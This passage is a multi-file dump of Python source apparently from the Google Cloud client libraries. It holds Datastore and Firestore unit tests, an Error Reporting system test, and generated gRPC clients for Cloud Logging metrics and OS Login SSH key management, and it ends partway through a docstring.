project_id=project_id, transaction=transaction)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_rollback_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
transaction = b'-34'
with pytest.raises(CustomException):
client.rollback(project_id, transaction)
def test_allocate_ids(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.AllocateIdsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
keys = []
response = client.allocate_ids(project_id, keys)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.AllocateIdsRequest(
project_id=project_id, keys=keys)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_allocate_ids_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
keys = []
with pytest.raises(CustomException):
client.allocate_ids(project_id, keys)
def test_reserve_ids(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.ReserveIdsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
keys = []
response = client.reserve_ids(project_id, keys)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.ReserveIdsRequest(
project_id=project_id, keys=keys)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_reserve_ids_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
keys = []
with pytest.raises(CustomException):
client.reserve_ids(project_id, keys)
```
#### File: gapic/v1beta1/test_system_report_errors_service_v1beta1.py
```python
import os
import time
from google.cloud import errorreporting_v1beta1
from google.cloud.errorreporting_v1beta1.proto import common_pb2
from google.cloud.errorreporting_v1beta1.proto import report_errors_service_pb2
class TestSystemReportErrorsService(object):
def test_report_error_event(self):
project_id = os.environ['PROJECT_ID']
client = errorreporting_v1beta1.ReportErrorsServiceClient()
project_name = client.project_path(project_id)
message = '[MESSAGE]'
service = '[SERVICE]'
service_context = {'service': service}
file_path = 'path/to/file.lang'
line_number = 42
function_name = 'meaningOfLife'
report_location = {
'file_path': file_path,
'line_number': line_number,
'function_name': function_name
}
context = {'report_location': report_location}
event = {
'message': message,
'service_context': service_context,
'context': context
}
response = client.report_error_event(project_name, event)
```
#### File: tests/unit/test_batch.py
```python
import unittest
import mock
class TestWriteBatch(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.firestore_v1beta1.batch import WriteBatch
return WriteBatch
def _make_one(self, *args, **kwargs):
klass = self._get_target_class()
return klass(*args, **kwargs)
def test_constructor(self):
batch = self._make_one(mock.sentinel.client)
self.assertIs(batch._client, mock.sentinel.client)
self.assertEqual(batch._write_pbs, [])
def test__add_write_pbs(self):
batch = self._make_one(mock.sentinel.client)
self.assertEqual(batch._write_pbs, [])
batch._add_write_pbs([mock.sentinel.write1, mock.sentinel.write2])
self.assertEqual(
batch._write_pbs, [mock.sentinel.write1, mock.sentinel.write2])
def test_create(self):
from google.cloud.firestore_v1beta1.proto import common_pb2
from google.cloud.firestore_v1beta1.proto import document_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('this', 'one')
document_data = {'a': 10, 'b': 2.5}
ret_val = batch.create(reference, document_data)
self.assertIsNone(ret_val)
new_write_pb = write_pb2.Write(
update=document_pb2.Document(
name=reference._document_path,
fields={
'a': _value_pb(integer_value=document_data['a']),
'b': _value_pb(double_value=document_data['b']),
},
),
current_document=common_pb2.Precondition(exists=False),
)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_set(self):
from google.cloud.firestore_v1beta1.proto import document_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('another', 'one')
field = 'zapzap'
value = u'meadows and flowers'
document_data = {field: value}
ret_val = batch.set(reference, document_data)
self.assertIsNone(ret_val)
new_write_pb = write_pb2.Write(
update=document_pb2.Document(
name=reference._document_path,
fields={
field: _value_pb(string_value=value),
},
),
)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_set_merge(self):
from google.cloud.firestore_v1beta1.proto import document_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('another', 'one')
field = 'zapzap'
value = u'meadows and flowers'
document_data = {field: value}
ret_val = batch.set(reference, document_data, merge=True)
self.assertIsNone(ret_val)
new_write_pb = write_pb2.Write(
update=document_pb2.Document(
name=reference._document_path,
fields={
field: _value_pb(string_value=value),
},
),
update_mask={'field_paths': [field]}
)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_update(self):
from google.cloud.firestore_v1beta1.proto import common_pb2
from google.cloud.firestore_v1beta1.proto import document_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('cats', 'cradle')
field_path = 'head.foot'
value = u'knees toes shoulders'
field_updates = {field_path: value}
ret_val = batch.update(reference, field_updates)
self.assertIsNone(ret_val)
map_pb = document_pb2.MapValue(fields={
'foot': _value_pb(string_value=value),
})
new_write_pb = write_pb2.Write(
update=document_pb2.Document(
name=reference._document_path,
fields={'head': _value_pb(map_value=map_pb)},
),
update_mask=common_pb2.DocumentMask(field_paths=[field_path]),
current_document=common_pb2.Precondition(exists=True),
)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_delete(self):
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('early', 'mornin', 'dawn', 'now')
ret_val = batch.delete(reference)
self.assertIsNone(ret_val)
new_write_pb = write_pb2.Write(delete=reference._document_path)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_commit(self):
from google.cloud.firestore_v1beta1.proto import firestore_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
# Create a minimal fake GAPIC with a dummy result.
firestore_api = mock.Mock(spec=['commit'])
commit_response = firestore_pb2.CommitResponse(
write_results=[
write_pb2.WriteResult(),
write_pb2.WriteResult(),
],
)
firestore_api.commit.return_value = commit_response
# Attach the fake GAPIC to a real client.
client = _make_client('grand')
client._firestore_api_internal = firestore_api
# Actually make a batch with some mutations and call commit().
batch = self._make_one(client)
document1 = client.document('a', 'b')
batch.create(document1, {'ten': 10, 'buck': u'ets'})
document2 = client.document('c', 'd', 'e', 'f')
batch.delete(document2)
write_pbs = batch._write_pbs[::]
write_results = batch.commit()
self.assertEqual(write_results, list(commit_response.write_results))
# Make sure batch has no more "changes".
self.assertEqual(batch._write_pbs, [])
# Verify the mocks.
firestore_api.commit.assert_called_once_with(
client._database_string, write_pbs, transaction=None,
metadata=client._rpc_metadata)
def _value_pb(**kwargs):
from google.cloud.firestore_v1beta1.proto.document_pb2 import Value
return Value(**kwargs)
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
def _make_client(project='seventy-nine'):
from google.cloud.firestore_v1beta1.client import Client
credentials = _make_credentials()
return Client(project=project, credentials=credentials)
```
#### File: cloud/logging/resource.py
```python
import collections
class Resource(collections.namedtuple('Resource', 'type labels')):
"""A monitored resource identified by specifying values for all labels.
:type type: str
:param type: The resource type name.
:type labels: dict
:param labels: A mapping from label names to values for all labels
enumerated in the associated :class:`ResourceDescriptor`.
"""
__slots__ = ()
@classmethod
def _from_dict(cls, info):
"""Construct a resource object from the parsed JSON representation.
:type info: dict
:param info:
A ``dict`` parsed from the JSON wire-format representation.
:rtype: :class:`Resource`
:returns: A resource object.
"""
return cls(
type=info['type'],
labels=info.get('labels', {}),
)
def _to_dict(self):
"""Build a dictionary ready to be serialized to the JSON format.
:rtype: dict
:returns: A dict representation of the object that can be written to
the API.
"""
return {
'type': self.type,
'labels': self.labels,
}
```
#### File: logging_v2/gapic/metrics_service_v2_client.py
```python
import functools
import pkg_resources
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.page_iterator
import google.api_core.path_template
from google.api import monitored_resource_pb2
from google.cloud.logging_v2.gapic import enums
from google.cloud.logging_v2.gapic import metrics_service_v2_client_config
from google.cloud.logging_v2.proto import log_entry_pb2
from google.cloud.logging_v2.proto import logging_config_pb2
from google.cloud.logging_v2.proto import logging_metrics_pb2
from google.cloud.logging_v2.proto import logging_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
'google-cloud-logging', ).version
class MetricsServiceV2Client(object):
"""Service for configuring logs-based metrics."""
SERVICE_ADDRESS = 'logging.googleapis.com:443'
"""The default address of the service."""
# The scopes needed to make gRPC calls to all of the methods defined in
# this service
_DEFAULT_SCOPES = (
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/cloud-platform.read-only',
'https://www.googleapis.com/auth/logging.admin',
'https://www.googleapis.com/auth/logging.read',
'https://www.googleapis.com/auth/logging.write',
)
# The name of the interface for this client. This is the key used to find
# method configuration in the client_config dictionary.
_INTERFACE_NAME = 'google.logging.v2.MetricsServiceV2'
@classmethod
def project_path(cls, project):
"""Return a fully-qualified project string."""
return google.api_core.path_template.expand(
'projects/{project}',
project=project,
)
@classmethod
def metric_path(cls, project, metric):
"""Return a fully-qualified metric string."""
return google.api_core.path_template.expand(
'projects/{project}/metrics/{metric}',
project=project,
metric=metric,
)
def __init__(self,
channel=None,
credentials=None,
client_config=metrics_service_v2_client_config.config,
client_info=None):
"""Constructor.
Args:
channel (grpc.Channel): A ``Channel`` instance through
which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
client_config (dict): A dictionary of call options for each
method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# If both `channel` and `credentials` are specified, raise an
# exception (channels come with credentials baked in already).
if channel is not None and credentials is not None:
raise ValueError(
'The `channel` and `credentials` arguments to {} are mutually '
'exclusive.'.format(self.__class__.__name__), )
# Create the channel.
if channel is None:
channel = google.api_core.grpc_helpers.create_channel(
self.SERVICE_ADDRESS,
credentials=credentials,
scopes=self._DEFAULT_SCOPES,
)
# Create the gRPC stubs.
self.metrics_service_v2_stub = (
logging_metrics_pb2.MetricsServiceV2Stub(channel))
if client_info is None:
client_info = (
google.api_core.gapic_v1.client_info.DEFAULT_CLIENT_INFO)
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config['interfaces'][self._INTERFACE_NAME], )
# Write the "inner API call" methods to the class.
# These are wrapped versions of the gRPC stub methods, with retry and
# timeout configuration applied, called by the public methods on
# this class.
self._list_log_metrics = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.ListLogMetrics,
default_retry=method_configs['ListLogMetrics'].retry,
default_timeout=method_configs['ListLogMetrics'].timeout,
client_info=client_info,
)
self._get_log_metric = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.GetLogMetric,
default_retry=method_configs['GetLogMetric'].retry,
default_timeout=method_configs['GetLogMetric'].timeout,
client_info=client_info,
)
self._create_log_metric = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.CreateLogMetric,
default_retry=method_configs['CreateLogMetric'].retry,
default_timeout=method_configs['CreateLogMetric'].timeout,
client_info=client_info,
)
self._update_log_metric = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.UpdateLogMetric,
default_retry=method_configs['UpdateLogMetric'].retry,
default_timeout=method_configs['UpdateLogMetric'].timeout,
client_info=client_info,
)
self._delete_log_metric = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.DeleteLogMetric,
default_retry=method_configs['DeleteLogMetric'].retry,
default_timeout=method_configs['DeleteLogMetric'].timeout,
client_info=client_info,
)
# Service calls
def list_log_metrics(self,
parent,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Lists logs-based metrics.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>>
>>> # Iterate over all results
>>> for element in client.list_log_metrics(parent):
... # process element
... pass
>>>
>>> # Or iterate over results one page at a time
>>> for page in client.list_log_metrics(parent, options=CallOptions(page_token=INITIAL_PAGE)):
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The name of the project containing the metrics:
::
\"projects/[PROJECT_ID]\"
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.gax.PageIterator` instance. By default, this
is an iterable of :class:`~google.cloud.logging_v2.types.LogMetric` instances.
This object can also be configured to iterate over the pages
of the response through the `options` parameter.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.ListLogMetricsRequest(
parent=parent,
page_size=page_size,
)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._list_log_metrics,
retry=retry,
timeout=timeout,
metadata=metadata),
request=request,
items_field='metrics',
request_token_field='page_token',
response_token_field='next_page_token',
)
return iterator
def get_log_metric(self,
metric_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Gets a logs-based metric.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> metric_name = client.metric_path('[PROJECT]', '[METRIC]')
>>>
>>> response = client.get_log_metric(metric_name)
Args:
metric_name (str): The resource name of the desired metric:
::
\"projects/[PROJECT_ID]/metrics/[METRIC_ID]\"
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.logging_v2.types.LogMetric` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.GetLogMetricRequest(
metric_name=metric_name, )
return self._get_log_metric(
request, retry=retry, timeout=timeout, metadata=metadata)
def create_log_metric(self,
parent,
metric,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Creates a logs-based metric.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> parent = client.project_path('[PROJECT]')
>>> metric = {}
>>>
>>> response = client.create_log_metric(parent, metric)
Args:
parent (str): The resource name of the project in which to create the metric:
::
\"projects/[PROJECT_ID]\"
The new metric must be provided in the request.
metric (Union[dict, ~google.cloud.logging_v2.types.LogMetric]): The new logs-based metric, which must not have an identifier that
already exists.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.logging_v2.types.LogMetric`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.logging_v2.types.LogMetric` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.CreateLogMetricRequest(
parent=parent,
metric=metric,
)
return self._create_log_metric(
request, retry=retry, timeout=timeout, metadata=metadata)
def update_log_metric(self,
metric_name,
metric,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Creates or updates a logs-based metric.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> metric_name = client.metric_path('[PROJECT]', '[METRIC]')
>>> metric = {}
>>>
>>> response = client.update_log_metric(metric_name, metric)
Args:
metric_name (str): The resource name of the metric to update:
::
\"projects/[PROJECT_ID]/metrics/[METRIC_ID]\"
The updated metric must be provided in the request and it's
``name`` field must be the same as ``[METRIC_ID]`` If the metric
does not exist in ``[PROJECT_ID]``, then a new metric is created.
metric (Union[dict, ~google.cloud.logging_v2.types.LogMetric]): The updated metric.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.logging_v2.types.LogMetric`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.logging_v2.types.LogMetric` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.UpdateLogMetricRequest(
metric_name=metric_name,
metric=metric,
)
return self._update_log_metric(
request, retry=retry, timeout=timeout, metadata=metadata)
def delete_log_metric(self,
metric_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Deletes a logs-based metric.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> metric_name = client.metric_path('[PROJECT]', '[METRIC]')
>>>
>>> client.delete_log_metric(metric_name)
Args:
metric_name (str): The resource name of the metric to delete:
::
\"projects/[PROJECT_ID]/metrics/[METRIC_ID]\"
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.DeleteLogMetricRequest(
metric_name=metric_name, )
self._delete_log_metric(
request, retry=retry, timeout=timeout, metadata=metadata)
```
#### File: oslogin_v1/gapic/os_login_service_client.py
```python
import pkg_resources
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.path_template
from google.cloud.oslogin_v1.gapic import os_login_service_client_config
from google.cloud.oslogin_v1.proto import common_pb2
from google.cloud.oslogin_v1.proto import oslogin_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
'google-cloud-os-login', ).version
class OsLoginServiceClient(object):
"""
Cloud OS Login API
The Cloud OS Login API allows you to manage users and their associated SSH
public keys for logging into virtual machines on Google Cloud Platform.
"""
SERVICE_ADDRESS = 'oslogin.googleapis.com:443'
"""The default address of the service."""
# The scopes needed to make gRPC calls to all of the methods defined in
# this service
_DEFAULT_SCOPES = (
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/cloud-platform.read-only',
'https://www.googleapis.com/auth/compute',
'https://www.googleapis.com/auth/compute.readonly',
)
# The name of the interface for this client. This is the key used to find
# method configuration in the client_config dictionary.
_INTERFACE_NAME = 'google.cloud.oslogin.v1.OsLoginService'
@classmethod
def user_path(cls, user):
"""Return a fully-qualified user string."""
return google.api_core.path_template.expand(
'users/{user}',
user=user,
)
@classmethod
def project_path(cls, user, project):
"""Return a fully-qualified project string."""
return google.api_core.path_template.expand(
'users/{user}/projects/{project}',
user=user,
project=project,
)
@classmethod
def fingerprint_path(cls, user, fingerprint):
"""Return a fully-qualified fingerprint string."""
return google.api_core.path_template.expand(
'users/{user}/sshPublicKeys/{fingerprint}',
user=user,
fingerprint=fingerprint,
)
def __init__(self,
channel=None,
credentials=None,
client_config=os_login_service_client_config.config,
client_info=None):
"""Constructor.
Args:
channel (grpc.Channel): A ``Channel`` instance through
which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
client_config (dict): A dictionary of call options for each
method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# If both `channel` and `credentials` are specified, raise an
# exception (channels come with credentials baked in already).
if channel is not None and credentials is not None:
raise ValueError(
'The `channel` and `credentials` arguments to {} are mutually '
'exclusive.'.format(self.__class__.__name__), )
# Create the channel.
if channel is None:
channel = google.api_core.grpc_helpers.create_channel(
self.SERVICE_ADDRESS,
credentials=credentials,
scopes=self._DEFAULT_SCOPES,
)
# Create the gRPC stubs.
self.os_login_service_stub = (oslogin_pb2.OsLoginServiceStub(channel))
if client_info is None:
client_info = (
google.api_core.gapic_v1.client_info.DEFAULT_CLIENT_INFO)
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config['interfaces'][self._INTERFACE_NAME], )
# Write the "inner API call" methods to the class.
# These are wrapped versions of the gRPC stub methods, with retry and
# timeout configuration applied, called by the public methods on
# this class.
self._delete_posix_account = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.DeletePosixAccount,
default_retry=method_configs['DeletePosixAccount'].retry,
default_timeout=method_configs['DeletePosixAccount'].timeout,
client_info=client_info,
)
self._delete_ssh_public_key = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.DeleteSshPublicKey,
default_retry=method_configs['DeleteSshPublicKey'].retry,
default_timeout=method_configs['DeleteSshPublicKey'].timeout,
client_info=client_info,
)
self._get_login_profile = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.GetLoginProfile,
default_retry=method_configs['GetLoginProfile'].retry,
default_timeout=method_configs['GetLoginProfile'].timeout,
client_info=client_info,
)
self._get_ssh_public_key = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.GetSshPublicKey,
default_retry=method_configs['GetSshPublicKey'].retry,
default_timeout=method_configs['GetSshPublicKey'].timeout,
client_info=client_info,
)
self._import_ssh_public_key = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.ImportSshPublicKey,
default_retry=method_configs['ImportSshPublicKey'].retry,
default_timeout=method_configs['ImportSshPublicKey'].timeout,
client_info=client_info,
)
self._update_ssh_public_key = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.UpdateSshPublicKey,
default_retry=method_configs['UpdateSshPublicKey'].retry,
default_timeout=method_configs['UpdateSshPublicKey'].timeout,
client_info=client_info,
)
# Service calls
def delete_posix_account(self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Deletes a POSIX account.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.project_path('[USER]', '[PROJECT]')
>>>
>>> client.delete_posix_account(name)
Args:
name (str): A reference to the POSIX account to update. POSIX accounts are identified
by the project ID they are associated with. A reference to the POSIX
account is in format ``users/{user}/projects/{project}``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.DeletePosixAccountRequest(name=name, )
self._delete_posix_account(
request, retry=retry, timeout=timeout, metadata=metadata)
def delete_ssh_public_key(self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Deletes an SSH public key.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.fingerprint_path('[USER]', '[FINGERPRINT]')
>>>
>>> client.delete_ssh_public_key(name)
Args:
name (str): The fingerprint of the public key to update. Public keys are identified by
their SHA-256 fingerprint. The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.DeleteSshPublicKeyRequest(name=name, )
self._delete_ssh_public_key(
request, retry=retry, timeout=timeout, metadata=metadata)
def get_login_profile(self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Retrieves the profile information used for logging in to a virtual machine
on Google Compute Engine.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.user_path('[USER]')
>>>
>>> response = client.get_login_profile(name)
Args:
name (str): The unique ID for the user in format ``users/{user}``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.oslogin_v1.types.LoginProfile` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.GetLoginProfileRequest(name=name, )
return self._get_login_profile(
request, retry=retry, timeout=timeout, metadata=metadata)
def get_ssh_public_key(self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Retrieves an SSH public key.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.fingerprint_path('[USER]', '[FINGERPRINT]')
>>>
>>> response = client.get_ssh_public_key(name)
Args:
name (str): The fingerprint of the public key to retrieve. Public keys are identified
by their SHA-256 fingerprint. The fingerprint of the public key is in
format ``users/{user}/sshPublicKeys/{fingerprint}``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.oslogin_v1.types.SshPublicKey` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
